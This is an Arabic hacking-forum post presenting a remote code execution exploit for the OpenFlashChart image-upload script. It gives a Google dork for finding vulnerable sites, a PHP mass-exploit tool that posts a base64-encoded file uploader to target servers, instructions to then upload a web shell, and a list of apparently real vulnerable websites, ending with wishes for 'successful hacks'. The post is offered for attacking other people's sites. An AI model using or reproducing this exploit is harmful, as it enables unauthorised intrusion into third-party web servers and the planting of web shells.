حصريا على جيوش الهكرز Remote Code Execution

حصريا على جيوش الهكرز Remote Code Execution


النتائج 1 إلى 10 من 12

الموضوع: حصريا على جيوش الهكرز Remote Code Execution

مشاهدة المواضيع

المشاركة السابقة المشاركة السابقة   المشاركة التالية المشاركة التالية
  1. #1

    Hasri حصريا على جيوش الهكرز Remote Code Execution




    السلام عليكم ورحمة الله وبركاته
    الحمد لله والصلاة والسلام على رسول الله ، وعلى آله وصحبه ومن اتبع هداه ، أما بعد :



    من إكتشافي: ثغرة Remote Code Execution في العديد من السكربتات


    الشـــرح


    نضع الدرك في محرك البحث google

    كود:
    intitle:Index of /tmp-upload-images/
    أنا إخترت هذا الموقع (مسار التخزين المؤقت للصور)

    كود:
    http://hot-cs.net/lime/limewizard/_scripts/openflashchart/tmp-upload-images/


    نذهب لهذا المسار (مسار التحميل)

    كود:
    http://hot-cs.net/lime/limewizard/_scripts/openflashchart/php-ofc-library/ofc_upload_image.php
    تظهر لنا هذه الرسالة لتؤكد لنا أن الموقع مصاب

    كود:
    Saving your image to: ../tmp-upload-images/


    نضع هذه المسارات في السكربت php التالي

    كود:
    <form method='POST'>
    <center>
    <input type='text' name='name' value='cyb.php'>
    <input type='submit' value='OK' name='OK'><br><br>
    <textarea name='situs' cols='45' rows='1'>http://target.com/</textarea>
    </center>
    </form>
    <?
            @set_time_limit(0);
            $site = explode("\r\n", $_POST['situs']);
            $namafile = $_POST['name'];
            $path = array('/lime/limewizard/_scripts/openflashchart/php-ofc-library/ofc_upload_image.php');
             
            $nama = array("/lime/limewizard/_scripts/openflashchart/tmp-upload-images/");
             
            $uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgfCBjeWIucGhwPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBzdWNjZXNzISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgZmFpbGVkICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
             
            $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
            $context = stream_context_create($options);
             
            if($_POST['OK'])
            {
                    foreach($site as $situs)
                    {
                            foreach($path as $upload)
                            {
                                    $fopen = @fopen("{$situs}{$upload}?name={$namafile}", 'r', false, $context);
                            }
                            foreach($nama as $namas)
                            {
                                    $url = "{$situs}{$namas}{$namafile}";
                                    $check = @file_get_contents($url);
                                    if(eregi("cyb.php", $check))
                                    {
                                            echo "<center><font face='Tahoma' color='Green' size='2'>[+] Exploit success => {$situs}/{$namas}/{$namafile} <br /></center>";
                                            flush();
                                    }
                            }
                    }
            }
            echo "<center><font face='Tahoma' color='Red' size='2'>[+] coded by Cyb3Rm0uJah3D</font></center>";
    ?>


    نستعرض هذا السكربت على سرفر شخصي أو على سرفر سبق إختراقه



    نضع رابط الموقع في المستطيل كما في الصورة ثم نضغط OK فنتحصل على رابط ملف التحميل cyb.php



    نستعرض الملف cyb.php ثم نرفع الشل في نفس المسار





    هذه بعض المواقع مصابة يمكن تطبيق الثغرة عليها

    http://web.kdz.eu/sites/all/modules/civicrm/packages/OpenFlashChart/tmp-upload-images/
    http://www.hastingsvoluntaryaction.o...upload-images/
    http://www.webstatus.designvault.co....upload-images/
    http://www.adcc.asn.au/main/administ...upload-images/


    ختاما، أتمنى لكم إختراقات موفقة

    ردودكم تهمني

    التعديل الأخير تم بواسطة Cyb3Rm0uJah3D ; 11-21-2013 الساعة 12:13 AM

المواضيع المتشابهه

  1. CiviCRM for Joomla 4.2.2 - Remote Code Injection
    بواسطة موآدع في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 04-26-2013, 01:48 PM
  2. phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution تم ترجمتها
    بواسطة Ace في المنتدى قسم الثغرات
    مشاركات: 5
    آخر مشاركة: 11-06-2011, 08:41 PM
  3. ثغرة remote command execution
    بواسطة angel2486 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 1
    آخر مشاركة: 11-25-2010, 07:39 PM
  4. ثغره جديده للمتصفح 7 Remote Code Execution
    بواسطة Spy4Man في المنتدى منتدى الإختراق العام
    مشاركات: 4
    آخر مشاركة: 08-24-2010, 05:43 AM
  5. Remote Command Execution
    بواسطة الهكر المجهول في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 01-22-2010, 10:06 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •